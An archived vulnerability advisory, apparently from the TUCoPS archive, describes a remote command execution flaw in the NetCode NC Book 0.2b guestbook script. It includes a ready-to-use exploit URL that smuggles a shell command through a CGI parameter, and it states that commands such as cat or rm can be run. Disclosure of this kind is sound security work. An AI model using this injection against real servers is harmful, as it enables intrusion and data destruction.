Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Apps :: ncbook~1.htm

NetCode NC Book 0.2b remote command execution



COMMAND

    NC Book

SYSTEMS AFFECTED

    NetCode NC Book 0.2b

PROBLEM

    'digitalseed' posted  following.   A pretty  big hole  in the main
    script of that guestbook leads to command execution on the  remote
    server running this vulnerable perl script.  Exploit:

        http://target/cgi-bin/ncbook/book.cgi?action=default¤t=|ls -la/|&form_tid=996604045&prev=main.html&list_message_index=10

    The  above  line  if  given  will  output the file contents of the
    kernel dir.  Also you can execute any commands (ls, cat, rm  etc).
    Original discovery: digitalseed and ksenor.

SOLUTION

    Nothing yet.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH